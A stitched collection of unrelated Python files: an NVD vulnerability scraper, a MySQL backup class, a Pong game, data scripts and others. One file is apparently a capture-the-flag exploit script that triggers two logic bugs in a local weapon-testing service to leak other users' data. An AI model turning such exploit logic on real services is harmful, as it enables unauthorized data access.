cell_width = w_sheet.col(0).width
# Write heads
for col in range(start_col, start_col + len(heads)):
w_sheet.write_merge(0, 1, col, col, heads[col - start_col], Repository.set_font(bold=True))
w_sheet.col(col).width = int(cell_width * 1.75)
start_col += len(heads)
# Write CVSS V3 head
w_sheet.write_merge(
0, 0,
start_col, start_col + len(cvss_head) - 1,
'CVSS Severity V3', Repository.set_font(bold=True)
)
for col in range(start_col, start_col + len(cvss_head)):
w_sheet.write(1, col, cvss_head[col - start_col], Repository.set_font(bold=True))
w_sheet.col(col).width = int(cell_width * 1.25)
start_col += len(cvss_head)
# Write CVSS V2 head
w_sheet.write_merge(
0, 0,
start_col, start_col + len(cvss_head) - 1,
'CVSS Severity V2', Repository.set_font(bold=True)
)
for col in range(start_col, start_col + len(cvss_head)):
w_sheet.write(1, col, cvss_head[col - start_col], Repository.set_font(bold=True))
w_sheet.col(col).width = int(cell_width * 1.25)
start_col += len(cvss_head)
# Write reference head
for index in range(0, 25):
reference_title = 'Reference ' + str(index + 1)
w_sheet.write_merge(
0, 0,
start_col, start_col + len(reference_head) - 1,
reference_title, Repository.set_font(bold=True)
)
for col in range(start_col, start_col + len(reference_head)):
w_sheet.write(1, col, reference_head[col - start_col], Repository.set_font(bold=True))
w_sheet.col(col).width = int(cell_width * 2)
start_col += len(reference_head)
# Save
w_workbook.save(path)
def get_dl_dict(base_soup, attrs=None):
if attrs is None:
attrs = {}
dl_dict = {}
tag_dl = base_soup.find('dl', attrs=attrs)
if tag_dl:
keys = []
for tag_dt in tag_dl.find_all('dt'):
keys.append(tag_dt.get_text().strip().replace(':', ''))
values = []
for tag_dd in tag_dl.find_all('dd'):
values.append(tag_dd.get_text().strip())
for index in range(len(keys)):
if index < len(values):
dl_dict.update({keys[index]: values[index]})
else:
dl_dict.update({keys[index]: ''})
return dl_dict
def update_dict_with_soup(dictionary, key, soup):
if key is not '':
if soup:
dictionary.update({key: soup.get_text().strip()})
else:
dictionary.update({key: ''})
# Capture vuln detail
def get_vuln_detail_dict(vuln_detail_url):
vuln_detail_dict = {}
# Connect
content = Repository.requests_get_content(vuln_detail_url, try_times=5, timeout=5)
if not content:
return vuln_detail_dict
url_soup = bs4.BeautifulSoup(content, "html.parser")
# Add current description
update_dict_with_soup(vuln_detail_dict, 'Current Description',
url_soup.find('p', attrs={'data-testid': 'vuln-description'}))
# Add analysis description
update_dict_with_soup(vuln_detail_dict, 'Analysis Description',
url_soup.find('p', attrs={'data-testid': 'vuln-analysis-description'}))
# Add impact
vuln_detail_dict.update(
{"CVSS Severity V3": get_dl_dict(url_soup, {'data-testid': 'vuln-cvssv3-score-container'})})
vuln_detail_dict.update(
{"CVSS Severity V2": get_dl_dict(url_soup, {'data-testid': 'vuln-cvssv2-score-container'})})
# Add reference
reference_list = Repository.get_reference_dict_list(url_soup)
patch_list = []
for reference in reference_list:
if re.match('.*patch', reference['Resource'], re.I):
reference_list.remove(reference)
patch_list.append(reference)
patch_list.extend(reference_list)
vuln_detail_dict.update({'References': patch_list})
# Add vuln type
tag_div = url_soup.find('div', attrs={'class': 'technicalDetails'})
if tag_div:
tag_li = tag_div.find('li')
if tag_li:
vuln_detail_dict.update({'Vulnerability Type': tag_li.get_text().strip()})
return vuln_detail_dict
# Write vuln detail in excel
def write_oss_vuln_detail(oss_info_dict):
# Get NVD records count
if 'Key Word' not in oss_info_dict.keys():
return
key_word = oss_info_dict['Key Word'].strip().replace(" ", "+")
oss_info_dict.update({'NVD Records Count': Repository.get_cve_count(key_word)})
print("NVD Records Count:" + str(oss_info_dict['NVD Records Count']))
if oss_info_dict['NVD Records Count'] <= 0:
return
# init workbook
save_path = \
'C:/Users/79196/Downloads/NVD/Simpler Result/' + oss_info_dict['Sequence Number'] \
+ '-' + oss_info_dict['Key Word'] + '.xls'
init_workbook(save_path)
row = 2
# Make Search Result URL
for start_index in range(0, oss_info_dict['NVD Records Count'], 20):
search_result_url = "https://nvd.nist.gov/vuln/search/results" \
"?adv_search=false&form_type=basic" \
"&results_type=overview&search_type=all" \
"&query=" + key_word + "&startIndex=" + str(start_index)
print("Connect:" + search_result_url)
# Capture vuln ID in one page
cve_id_list = Repository.get_cve_id_list(search_result_url)
if not cve_id_list:
print("No CVE Entry:" + search_result_url)
# Write vuln detail
for cve_id in cve_id_list:
cve_detail_url = "https://nvd.nist.gov/vuln/detail/" + cve_id
print("Connect:" + cve_detail_url, end='\t\t')
# Get vuln detail
vuln_detail_dict = get_vuln_detail_dict(cve_detail_url)
vuln_detail_dict.update({'CVE Number': cve_id})
vuln_detail_dict.update({'Detail Link': cve_detail_url})
write_workbook(vuln_detail_dict, save_path, row)
print('Rate:' + str(int((row - 1) / oss_info_dict['NVD Records Count'] * 100)) + '%')
row += 1
# Entrance
def main():
save_dir = 'C:/Users/79196/Downloads/NVD/Result'
if not os.path.exists(save_dir):
os.makedirs(save_dir)
# Get software name
print("Getting software name...")
software_name_list_path = "C:/Users/79196/Downloads/NVD/OSSList(V2).xls"
r_workbook = xlrd.open_workbook(software_name_list_path)
for r_sheet in r_workbook.sheets():
if r_sheet.nrows > 1:
for row in range(1, r_sheet.nrows):
oss_info_dict = {
'Sequence Number': str(r_sheet.cell(row, 0).value.strip()),
'Name': str(r_sheet.cell(row, 1).value.strip()),
'Key Word': str(r_sheet.cell(row, 2).value.strip()),
'Describe': str(r_sheet.cell(row, 3).value.strip())
}
print("Sequence Number:" + oss_info_dict['Sequence Number']
+ "\nSoftware:" + oss_info_dict['Name'])
# Write vuln detail
write_oss_vuln_detail(oss_info_dict)
if __name__ == "__main__":
main()
|
"""Class to describe MySQL backup copy"""
import json
from .periodic_copy import PeriodicCopy
from .exceptions import WrongInputData
class MySQLCopy(PeriodicCopy): # pylint: disable=too-many-instance-attributes
"""
Instantiate a MySQL copy.
:param host: Hostname where the backup was taken from.
:type host: str
:param run_type: Run type when the backup was taken: daily, weekly, etc.
:type run_type: str
:param name: Base name of the backup copy file as it's stored
on the destination.
:type name: str
:raise WrongInputData: if type is neither full or incremental,
if name is not a basename.
"""
__attr = [
"host",
"run_type",
"name",
"binlog",
"position",
"lsn",
"parent",
"galera",
"wsrep_provider_version",
"config",
"backup_started",
"backup_finished",
"type",
]
def __init__(self, *args, **kwargs):
super(MySQLCopy, self).__init__(*args, **kwargs)
self._source_type = "mysql"
if "type" in kwargs and kwargs.get("type") in ["full", "incremental"]:
self._type = kwargs.get("type")
else:
self._type = None
if "/" in self.name:
raise WrongInputData(
"name must be relative, without any slashes."
" Got %s instead." % self.name
)
self._backup_started = int(kwargs.get("backup_started", 0)) or None
self._backup_finished = int(kwargs.get("backup_finished", 0)) or None
self._binlog = kwargs.get("binlog", None)
self._position = kwargs.get("position", None)
self._lsn = kwargs.get("lsn", None)
self._parent = kwargs.get("parent", None)
if "wsrep_provider_version" in kwargs:
self._wsrep_provider_version = kwargs.get("wsrep_provider_version")
self._galera = self._wsrep_provider_version is not None
else:
self._galera = False
self._wsrep_provider_version = None
if "config" in kwargs and "config_files" in kwargs:
raise WrongInputData(
"Either config or config_files can be used "
"to initialize config attribute"
)
if "config_files" in kwargs:
self._config = {}
config_files = kwargs.get("config_files", [])
for config_file in config_files:
with open(config_file, "r") as config_descr:
self._config[config_file] = config_descr.read()
else:
self._config = kwargs.get("config", {})
def __eq__(self, other):
comparison = ()
for attr in self.__attr:
comparison += (getattr(self, attr) == getattr(other, attr),)
return all(comparison)
def __ne__(self, other):
return not self.__eq__(other)
def __str__(self):
# There is a bug https://bugs.python.org/issue16333
# dumps() leaves trailing whitespaces
return "%s(%s) = %s" % (
self.__class__.__name__,
self.key,
json.dumps(self.as_dict(), sort_keys=True, indent=4).replace(
" \n", "\n"
),
)
@property
def created_at(self):
"""Timestamp when the backup job started."""
return self._backup_started
@property
def backup_started(self):
"""Timestamp when the backup job started."""
return self._backup_started
@property
def backup_finished(self):
"""Timestamp when the backup job finished."""
return self._backup_finished
@property
def duration(self):
"""Time in seconds it took to take the backup."""
return self._backup_finished - self._backup_started
@property
def binlog(self):
"""File name of the binlog."""
return self._binlog
@property
def position(self):
"""Binlog position of the backup copy."""
return self._position
@property
def type(self):
"""Full or incremental."""
return self._type
@property
def parent(self):
"""For incremental backup it is a base full copy name."""
return self._parent
@property
def lsn(self):
"""LSN of the backup."""
return self._lsn
@property
def config(self):
"""Dictionary of configs and their content."""
return self._config
@property
def galera(self):
"""True if the backup was taken from Galera."""
return self._galera
@property
def wsrep_provider_version(self):
"""If it was Galera, value of wsrep_provider_version"""
return self._wsrep_provider_version
@property
def sort_key(self):
return self.created_at or 0
def as_dict(self):
"""Return representation of the class instance for output purposes."""
result = {}
for attr in self.__attr:
result[attr] = getattr(self, attr)
return result
def serialize(self):
"""Prepare the status for storing as a string."""
return json.dumps(self.as_dict())
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author:Speciallan
import os
anno_path = '../../data/VOCdevkit/SAR-Ship-Dataset/dataset_voc'
main_path = '../../data/VOCdevkit/SAR-Ship-Dataset/ImageSets/Main'
train_list = os.listdir(anno_path + '/train/Annotations')
test_list = os.listdir(anno_path + '/test/Annotations')
print(len(train_list), len(test_list))
with open(main_path + '/trainval.txt', 'w') as f:
for name in train_list:
if '.xml' in name:
f.write(name.replace('.xml', '') + '\n')
with open(main_path + '/test.txt', 'w') as f:
for name in test_list:
if '.xml' in name:
f.write(name.replace('.xml', '') + '\n')
|
#!/usr/bin/env python
# encoding: utf-8
def most_common(lst):
s = set(lst)
return max(s, key=lambda x: lst.count(x))
def POSEnsemble(lst):
ret = []
for i in range(len(lst[0])):
ret.append(most_common([l[i] for l in lst]))
return ret
|
"""distutils.errors
Provides exceptions used by the Distutils modules. Note that Distutils
modules may raise standard exceptions; in particular, SystemExit is
usually raised for errors that are obviously the end-user's fault
(eg. bad command-line arguments).
This module safe to use in "from ... import *" mode; it only exports
symbols whose names start with "Distutils" and end with "Error"."""
# created 1999/03/03, Greg Ward
__rcsid__ = "$Id$"
from types import *
if type (RuntimeError) is ClassType:
# DistutilsError is the root of all Distutils evil.
class DistutilsError (Exception):
pass
# DistutilsModuleError is raised if we are unable to load an expected
# module, or find an expected class within some module
class DistutilsModuleError (DistutilsError):
pass
# DistutilsClassError is raised if we encounter a distribution or command
# class that's not holding up its end of the bargain.
class DistutilsClassError (DistutilsError):
pass
# DistutilsGetoptError (help me -- I have JavaProgrammersDisease!) is
# raised if the option table provided to fancy_getopt is bogus.
class DistutilsGetoptError (DistutilsError):
pass
# DistutilsArgError is raised by fancy_getopt in response to getopt.error;
# distutils.core then turns around and raises SystemExit from that. (Thus
# client code should never see DistutilsArgError.)
class DistutilsArgError (DistutilsError):
pass
# DistutilsFileError is raised for any problems in the filesystem:
# expected file not found, etc.
class DistutilsFileError (DistutilsError):
pass
# DistutilsOptionError is raised anytime an attempt is made to access
# (get or set) an option that does not exist for a particular command
# (or for the distribution itself).
class DistutilsOptionError (DistutilsError):
pass
# String-based exceptions
else:
DistutilsError = 'DistutilsError'
DistutilsModuleError = 'DistutilsModuleError'
DistutilsClassError = 'DistutilsClassError'
DistutilsGetoptError = 'DistutilsGetoptError'
DistutilsArgError = 'DistutilsArgError'
DistutilsFileError = 'DistutilsFileError'
DistutilsOptionError = 'DistutilsOptionError'
|
# -*- coding:ascii -*-
from mako import runtime, filters, cache
UNDEFINED = runtime.UNDEFINED
__M_dict_builtin = dict
__M_locals_builtin = locals
_magic_number = 9
_modified_time = 1389308004.184105
_enable_loop = True
_template_filename = 'C:\\myStuff\\calculator\\styles/calc.cssm'
_template_uri = 'calc.cssm'
_source_encoding = 'ascii'
import os, os.path, re
_exports = []
def render_body(context,**pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(pageargs=pageargs)
__M_writer = context.writer()
# SOURCE LINE 1
__M_writer('/* Nothing here yet */')
return ''
finally:
context.caller_stack._pop_frame()
|
from setuptools import setup, find_packages
with open("README.md") as f:
readme = f.read()
with open("LICENSE") as f:
license = f.read()
setup(
name="gadi",
version="0.1.0",
description="Zugänglichere Versionen der Daten von gesetze-im-internet.de",
long_description=readme,
author="Niko Felger",
author_email="niko.felger@gmail.com",
url="https://github.com/nfelger/gesetze-aus-dem-internet",
license=license,
packages=find_packages(exclude=("tests", "docs", "example_json")),
)
|
from pysc2.env import sc2_env
from pysc2.lib import features
from pysc2.agents import base_agent
from pysc2.lib import actions
from absl import app
import numpy as np
import torch
MAPNAME = 'MoveToBeacon'
APM = 0
APM = int(APM / 18.75)
UNLIMIT = 0
VISUALIZE = False
REALTIME = True
if REALTIME :
REALTIME_GAME_LOOP_SECONDS = 1
else:
REALTIME_GAME_LOOP_SECONDS = 22.4
SCREEN_SIZE = 32
MINIMAP_SIZE = 16
CONTROL_GROUP_SET = 1
MARINE_GROUP_ORDER = 1
MOVE_SCREEN = 331
NOT_QUEUED = [0]
LEARNING_RATE = 0.001
GAMMA = 0.98
LMBDA = 0.95
EPS_CLIP = 0.1
K_EPOCH = 10
T_HORIZON = 1000
EPISODES = 10000
players = [sc2_env.Agent(sc2_env.Race.terran),]
interface = features.AgentInterfaceFormat(\
feature_dimensions = features.Dimensions(\
screen = SCREEN_SIZE, minimap = MINIMAP_SIZE), use_feature_units = True)
class Agent(base_agent.BaseAgent):
def step(self,obs):
super(Agent,self).step(obs)
return actions.FUNCTIONS.no_op()
def main(args):
agent = Agent()
try:
episode = 0
with sc2_env.SC2Env(map_name = MAPNAME, players = players,\
agent_interface_format = interface,\
step_mul = APM, game_steps_per_episode = UNLIMIT,\
visualize = VISUALIZE, realtime = REALTIME) as env:
while True:
if episode > EPISODES:
break
episode += 1
agent.setup(env.observation_spec(), env.action_spec())
timestep = env.reset()
agent.reset()
done = False
while not done :
for t in range(T_HORIZON):
step_actions = [agent.step(timestep[0])]
timestep = env.step(step_actions)
reward = timestep[0].reward
if timestep[0].last():
done = True
break
except KeyboardInterrupt:
pass
app.run(main) |
import sqlite3
import pytest
from ddht.v5_1.alexandria.advertisement_db import create_tables
@pytest.fixture
async def alice_alexandria_client(alice, alice_network):
async with alice.alexandria.client(alice_network) as alice_alexandria_client:
yield alice_alexandria_client
@pytest.fixture
async def bob_alexandria_client(bob, bob_network):
async with bob.alexandria.client(bob_network) as bob_alexandria_client:
yield bob_alexandria_client
@pytest.fixture
async def alice_alexandria_network(alice, alice_network):
async with alice.alexandria.network(alice_network) as alice_alexandria:
yield alice_alexandria
@pytest.fixture
async def bob_alexandria_network(bob, bob_network):
async with bob.alexandria.network(bob_network) as bob_alexandria:
yield bob_alexandria
@pytest.fixture
def base_conn():
return sqlite3.connect(":memory:")
@pytest.fixture
def conn(base_conn):
create_tables(base_conn)
return base_conn
|
import json
import uuid
from time import sleep
import requests
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry
class Api:
def __init__(self, hostname):
self.timeout = 4
self.hostname = hostname
self.cookies = {}
# user
def register(self, name, password):
request = {
"name": name,
"password": password
}
result = self.retryable_requests().post(
f"http://{self.hostname}/Account/register",
json=request, timeout=self.timeout
)
self.cookies = result.cookies.get_dict()
def add_claimed_weapon(self, name, is_vorpal, force, flag):
request = {
"name": name,
"isVorpal": is_vorpal,
"force": force,
"arcaneProperty": flag
}
result = self.retryable_requests().put(
f"http://{self.hostname}/Weapon/claimed",
json=request, timeout=self.timeout, cookies=self.cookies
)
def get_weapon(self, weapon_name):
request = {
"weaponName": weapon_name
}
result = self.retryable_requests().post(
f"http://{self.hostname}/Weapon/weapon",
json=request, timeout=self.timeout, cookies=self.cookies
)
return result.json()
def get_weapon_list(self):
result = self.retryable_requests().get(
f"http://{self.hostname}/Weapon/weaponList",
timeout=self.timeout, cookies=self.cookies
)
return result.json()
def test_weapon(self, breeding_seed, weapon_name):
request = {
"breedingSeed": breeding_seed,
"weaponName": weapon_name
}
result = requests.put(
f"http://{self.hostname}/Jabberwocky/weaponTestResult",
json=request, timeout=self.timeout, cookies=self.cookies, verify=False
)
return result
def get_juberwocky_list(self):
result = self.retryable_requests().get(
f"http://{self.hostname}/Jabberwocky/jabberwockyList",
timeout=self.timeout, cookies=self.cookies
)
return result.json()
def retryable_requests(self,
retries=3,
backoff_factor=0.3,
status_forcelist=(400, 409, 500, 502, 504),
session=None,
):
session = session or requests.Session()
retry = Retry(
total=retries,
read=retries,
connect=retries,
backoff_factor=backoff_factor,
status_forcelist=status_forcelist,
)
adapter = HTTPAdapter(max_retries=retry)
session.mount('http://', adapter)
session.mount('https://', adapter)
return session
class Object(object):
pass
api = Api("0.0.0.0:9000")
user = Object()
user.name = str(uuid.uuid4())
user.password = str(uuid.uuid4())
api.register(user.name, user.password)
# Vuln 1.
weapon_name = str(uuid.uuid4())
api.add_claimed_weapon(weapon_name, False, "NaN", "")
jw_list = api.get_juberwocky_list()
w_list = api.get_weapon_list()
result = api.test_weapon(jw_list[0], weapon_name)
print(result.content)
# Vuln 2.
user = Object()
user.name = str(uuid.uuid4())
user.password = str(uuid.uuid4())
api.register(user.name, user.password)
# forbidden weapon claimed
result = api.get_weapon(weapon_name)
print(result)
sleep(60 * 11)
# index cleaned up weapon shared
weapon = api.get_weapon(weapon_name)
print(weapon) |
"""Module used for creating the "urls.json" file"""
import json
import pathlib
import discord
from more_itertools import chunked
__all__ = ['upload_images', 'save_image_urls', 'get_card_image_file', 'get_card_image_url']
_CARD_IMG_PATH = pathlib.Path('data/images/cards')
_CARD_IMG_URLS_PATH = _CARD_IMG_PATH / 'urls.json'
_card_image_urls = {}
try:
with open(_CARD_IMG_URLS_PATH) as f:
urls = json.load(f)
except Exception:
import logging
logging.exception(f'Error occured when loading {_CARD_IMG_URLS_PATH}')
else:
_card_image_urls.update(urls)
async def upload_images(channel):
"""Upload the images to Discord and return the resulting attachments"""
result = {}
for chunk in chunked(_CARD_IMG_PATH.glob('*.png'), 10):
files = [discord.File(str(f.resolve())) for f in chunk]
message = await channel.send(files=files)
result.update((a.filename.replace('-', ' '), a.url) for a in message.attachments)
return result
async def save_image_urls(channel, filename=_CARD_IMG_URLS_PATH):
"""Like upload_images but saves the resulting dict into a file."""
result = await upload_images(channel)
with open(filename, 'w') as f:
json.dump(result, f, indent=4, separators=(',', ': '))
def get_card_image_file(card):
"""Return a Path object containing the location of the image of the card."""
return _CARD_IMG_PATH / f'{card.rank.short}-of-{card.suit.name}s.png'
def get_card_image_url(card):
"""Return the URL of the image of the card."""
return _card_image_urls.get(str(card))
|
import tslearn
import numpy as np
import pandas as pd
from tslearn.preprocessing import TimeSeriesScalerMinMax
from tslearn.piecewise import PiecewiseAggregateApproximation as PAA
import matplotlib.pyplot as plt
import os, argparse
import json
ap = argparse.ArgumentParser()
ap.add_argument("--dimrec", type = int, choices = [0, 1], required = True, default = 0)
dimrec = ap.parse_args().dimrec
n_segments = 10
# Reading data
stocks_df = pd.read_csv("data/stocks.csv")
# Formatting the date column
stocks_df.date = pd.to_datetime(stocks_df.date, format='%d/%m/%Y')
# Dropping column with many missing values
stocks_df.drop(columns = ["SAMIR", "Diac Salaf", "Aradei Capital", "Mutandis", "Immr Invest"], inplace = True)
# Filling other missing values
stocks_df = stocks_df.ffill()
stocks_df = stocks_df.bfill()
# Resample daily data into weekly data
stocks_df = stocks_df.resample('7D', on = 'date').first().reset_index(drop = True)
# setting date as index
stocks_df.index = stocks_df.date
stocks_df.drop("date", axis = 1, inplace = True)
cols = stocks_df.columns
if not os.path.isdir("plots"):
os.mkdir("plots")
fig, axs = plt.subplots(10,7,figsize=(35,35))
for i in range(10):
for j in range(7):
axs[i, j].plot(stocks_df[cols[i*7+j]].values)
axs[i, j].set_title(cols[i*7+j])
plt.savefig('plots/timeseries.jpeg')
# Normalize and reshape time series
ts = np.array(stocks_df.T).reshape(stocks_df.T.shape[0], stocks_df.T.shape[1], 1)
ts = TimeSeriesScalerMinMax().fit_transform(ts)
# Run PAA (if specified)
def run_paa(ts, n_segments):
print("running PAA")
paa = PAA(n_segments = n_segments)
ts_paa = paa.fit_transform(ts)
return ts_paa
if dimrec:
ts = run_paa(ts, n_segments)
stocks_df.to_csv("data/processed_df.csv")
np.savetxt("data/data_preprocessed.csv", ts.reshape(ts.shape[0], ts.shape[1]))
|
# in
sentence = 'hello'
print('hello' in sentence)
|
import objects
import ledmatrixdrawer
import object_playground
import points
# import random_blocks
import rgbleddrawer
import controller
import pygame
import numbertoblock
import datetime
import Pong_collisions
import gamespeed
import time
import random
import Ball_Steuerung
def titlescreen(rgb:rgbleddrawer.RgbLedDrawer(), playground:object_playground.Playground, ball, paddle_top, paddle_bot):
paddle_top.posx = 4
paddle_bot.posx = 4
paddle_top.posy = 0
paddle_bot.posy = 19
ball.posx = 5
playground.add_object(paddle_top, paddle_top.posx, paddle_top.posy)
playground.add_object(paddle_bot, paddle_bot.posx, paddle_bot.posy)
ball.posy = 7
playground.add_object(ball, ball.posx, ball.posy)
def run_game():
# variables for objects
paddle_left = objects.object_list[0]
paddle_right = objects.object_list[1]
paddle_top = objects.object_list[2]
paddle_bot = objects.object_list[3]
ball = objects.object_list[4]
anfang = random.random()
# Some stuff needed by PyGame
pygame.init()
gameover_sound = pygame.mixer.Sound('./Music/GameOver.wav')
abpraller_sound = pygame.mixer.Sound('./Music/break.wav')
fail = pygame.mixer.Sound('./Music/fail_sound.wav')
# use Joystick and Controller
pygame.joystick.init()
joystick = pygame.joystick.Joystick(0)
joystick.init()
joystick2 = pygame.joystick.Joystick(1)
joystick2.init()
gamepad = controller.Controller(joystick)
gamepad2 = controller.Controller(joystick2)
# drawer for playfield
rgb_led_drawer = rgbleddrawer.RgbLedDrawer()
# drawer for scoreboard
led_matrix_drawer = ledmatrixdrawer.LedMatrixDrawer()
# Playgrounds
color_playground = object_playground.Playground(20, 10)
red_playground = object_playground.Playground(8, 32)
color_playground.clear()
titlescreen(rgb_led_drawer, color_playground, ball, paddle_top, paddle_bot)
# Prepare red_playgound to repaint...
# red_playground.clear()
# color_playground.clear()
# Add preview block to red_playgound
i = 0
paddle_top.posx = 4
paddle_bot.posx = 4
paddle_top.posy = 0
paddle_bot.posy = 19
ball.posx = 5
color_playground.add_object(paddle_top, paddle_top.posx, paddle_top.posy)
color_playground.add_object(paddle_bot, paddle_bot.posx, paddle_bot.posy)
if anfang > 0.5:
ball.posy = 7
color_playground.add_object(ball, ball.posx, ball.posy)
ball.orientation_y = 1
else:
ball.posy = 12
color_playground.add_object(ball, ball.posx, ball.posy)
ball.orientation_y = -1
# draw red_playgound
rgb_led_drawer.draw_playground(color_playground)
led_matrix_drawer.draw_playground(red_playground)
color_playground.clear()
red_playground.clear()
score1 = 0
score2 = 0
# gamestruktur
game_over = False
while game_over == False:
Runde = 0
Ball_Steuerung.Ball_Steuerung.ball_orientation(Ball_Steuerung.Ball_Steuerung, ball)
time_to_wait = 500 - 50 * (score1 + score2)
ball.posx = 5
while True:
Runde += 1
gamepad.Paddle_Steuerung(paddle_top)
while paddle_top.posx > 7:
paddle_top.posx -= 1
while paddle_top.posx < 0:
paddle_top.posx += 1
# bot_steuerung_mit_fail(paddle_top,ball)
#gamepad2.Paddle_Steuerung(paddle_bot)
#while paddle_bot.posx > 7:
#paddle_bot.posx -= 1
#while paddle_bot.posx < 0:
#paddle_bot.posx += 1
bot_steuerung_mit_fail(paddle_bot, ball, score1)
color_playground.add_object(paddle_top, paddle_top.posx, paddle_top.posy)
color_playground.add_object(paddle_bot, paddle_bot.posx, paddle_bot.posy)
red_playground.add_block(numbertoblock.NumberToBlock.get_block_einzelne_zahl(score1), 0, 0)
red_playground.add_block(numbertoblock.NumberToBlock.get_block_einzelne_zahl(score2), 24, 0)
if ball.posx == 0:
Runde += 1
ball.orientation_x = -ball.orientation_x
pygame.mixer.Sound.play(abpraller_sound)
if ball.posx == 9:
Runde += 1
ball.orientation_x = -ball.orientation_x
pygame.mixer.Sound.play(abpraller_sound)
if Pong_collisions.Collision_Dedektor.with_object(Pong_collisions.Collision_Dedektor, color_playground, ball, ball.posx + ball.orientation_x, ball.posy + ball.orientation_y) == True:
Runde += 1
ball.orientation_y = -ball.orientation_y
pygame.mixer.Sound.play(abpraller_sound)
if time_to_wait > 0:
time_to_wait -= 10
if object_is_above_beginning(ball) == True:
score2 += 1
ball.posy = 12
red_playground.clear()
red_playground.add_block(numbertoblock.NumberToBlock.get_block_einzelne_zahl(score1), 0, 0)
red_playground.add_block(numbertoblock.NumberToBlock.get_block_einzelne_zahl(score2), 24, 0)
led_matrix_drawer.draw_playground(red_playground)
break
if object_is_below_bottom(ball) == True:
score1 += 1
ball.posy = 7
red_playground.clear()
red_playground.add_block(numbertoblock.NumberToBlock.get_block_einzelne_zahl(score1), 0, 0)
red_playground.add_block(numbertoblock.NumberToBlock.get_block_einzelne_zahl(score2), 24, 0)
led_matrix_drawer.draw_playground(red_playground)
pygame.mixer.Sound.play(fail)
break
ball.posx = ball.posx + ball.orientation_x
ball.posy = ball.posy + ball.orientation_y
color_playground.add_object(ball, ball.posx, ball.posy)
rgb_led_drawer.draw_playground(color_playground)
led_matrix_drawer.draw_playground(red_playground)
color_playground.clear()
red_playground.clear()
pygame.time.wait(time_to_wait - Runde)
if score1 == 3:
pygame.time.wait(3000)
game_over = True
break
if score2 == 3:
pygame.time.wait(3000)
game_over = True
break
pygame.time.wait(3000)
color_playground.clear()
red_playground.clear()
pygame.mixer.Sound.play(gameover_sound)
# Spiel
pygame.time.wait(5000)
del led_matrix_drawer
del rgb_led_drawer
pygame.event.get()
def object_is_above_beginning(object):
if object.posy <= 0:
return True
return False
def object_is_below_bottom(object):
if object.posy >= 19:
return True
return False
def check_for_full_lines(calculator, color_playground, full_line_detector, score):
lines = full_line_detector.detect_lines(color_playground)
full_line_detector.delete_full_lines(lines, color_playground)
score = calculator.points(score, len(lines), 0)
return score
def round(b: object, b1: object, b2: object, c: Pong_collisions.Collision_Dedektor, p: object_playground, bs: Ball_Steuerung, joy1,
joy2):
Ball_Steuerung.position_calculator(bs, p, b1, b2, c, b)
# Controller.Paddle_Steuerung(joy1, b1)
# Controller.Paddle_Steuerung(joy2, b2)
def bot_steuerung_mit_fail(s:object,b:object,score1):
scorediff = 0
if score1 == 1:
scorediff = 0.5
if score1 == 2:
scorediff = 1
fail = random.random()
if fail > 0.3-scorediff:
if s.posx-b.posx >= 0:
if s.posx > 0:
s.posx -= 1
if s.posx-b.posx+2 <= 0:
if s.posx < 7:
s.posx += 1
def bot_steuerung(s:object,b:object):
if s.posx-b.posx >= 0:
if s.posx > 0:
s.posx -= 1
if s.posx-b.posx+2 <= 0:
if s.posx < 7:
s.posx += 1
if __name__ == "__main__":
while True:
run_game()
|
from google_images_download import google_images_download
import json
from PIL import Image
import os
import time
import tensorflow as tf
def verify_image(img_file, sess):
# test image
try:
v_image = open(img_file, 'rb')
return sess.run(tf.image.is_jpeg(v_image.read()))
# is valid
#print("valid file: "+img_file)
except:
return False
def read_config(file_name):
with open(file_name) as f:
data = json.load(f)
return data
def main():
config = read_config('config.json')
defaultImageCount = config.get("defaultImageCount", 100)
fetcher = google_images_download.googleimagesdownload()
for label in config["labels"]:
count = label.get("count", defaultImageCount)
name = label['name']
if 'suffix' in label:
for suffix in label['suffix']:
print(suffix)
absolute_image_paths = fetcher.download(
{"keywords": name + ' ' + suffix, "image_directory": name, "limit": count, "format": "jpg"})
else:
absolute_image_paths = fetcher.download(
{"keywords": name, "image_directory": name, "limit": count, "format": "jpg"})
sess = tf.InteractiveSession()
idx = 0
for root, dirs, files in os.walk(os.path.join(os.getcwd(), 'downloads')):
for file in files:
currentFile = os.path.join(root, file)
# test image
if not verify_image(currentFile, sess):
print('removed')
os.remove(currentFile)
continue
newFileName = os.path.join(root, str(idx) + ".jpg")
os.rename(currentFile, newFileName)
idx = idx + 1
if __name__ == '__main__':
main()
|
import datetime
from propagators.base import Propagator
from astropy.coordinates import EarthLocation, GCRS
from astropy.time import Time
from astropy import units as u
from simpy.core import Environment
from typing import (
List,
Dict,
Tuple,
Any,
Iterator,
Optional,
Type,
Callable,
Generator,
Iterable,
Union as typeUnion,
)
class GeoPoint(Propagator):
def __init__(
self, env: Environment, name: str, configuration: Dict[str, Any]
) -> None:
super().__init__(env, name, configuration)
self.lat: typeUnion[str, float] = configuration.get("Lat_deg", 0.0)
self.lon: typeUnion[str, float] = configuration.get("Lon_deg", 0.0)
self.alt: typeUnion[str, float] = configuration.get("Alt_km", 0.0)
self.angle_off_north: typeUnion[str, float] = configuration.get(
"angle_off_north_deg", 0.0
)
self.velocity: float = 0.0
self._el = EarthLocation.from_geodetic(
self.lon * u.deg, self.lat * u.deg, self.alt * u.km
)
def getLocationAtSimtime(
self, simtime: Optional[float] = None
) -> Tuple[Tuple[Any, Any, Any], Tuple[Any, Any]]:
if not simtime:
simtime = self.env.now
#!TODO Incorporate velocity
return (
self._el.lat.to(u.deg).value,
self._el.lon.to(u.deg).value,
self._el.height.to(u.km).value,
), (0, 0, 0)
def getCoordsAtSimtime(
self, simtime: Optional[float] = None
) -> Tuple[Tuple[Any, Any, Any], Tuple[Any, Any]]:
if not simtime:
simtime = self.env.now
#!TODO Incorporate velocity
epoch_time = (self.env.epoch + datetime.timedelta(seconds=simtime)).replace(
tzinfo=None
)
time_epoch_time = Time(epoch_time.isoformat(), format="isot", scale="utc")
itrs = self._el.get_itrs(obstime=time_epoch_time)
gcrs = itrs.transform_to(GCRS(obstime=time_epoch_time))
return (
gcrs.cartesian.x.to(u.km),
gcrs.cartesian.y.to(u.km),
gcrs.cartesian.z.to(u.km),
), (0, 0, 0)
|
from tkinter import Tk , Label , Button , PhotoImage;
from tkinter.ttk import Progressbar;
from tkinter.filedialog import asksaveasfile
from threading import Thread;
from os import remove , fdopen;
from sys import getsizeof;
from tempfile import mkstemp;
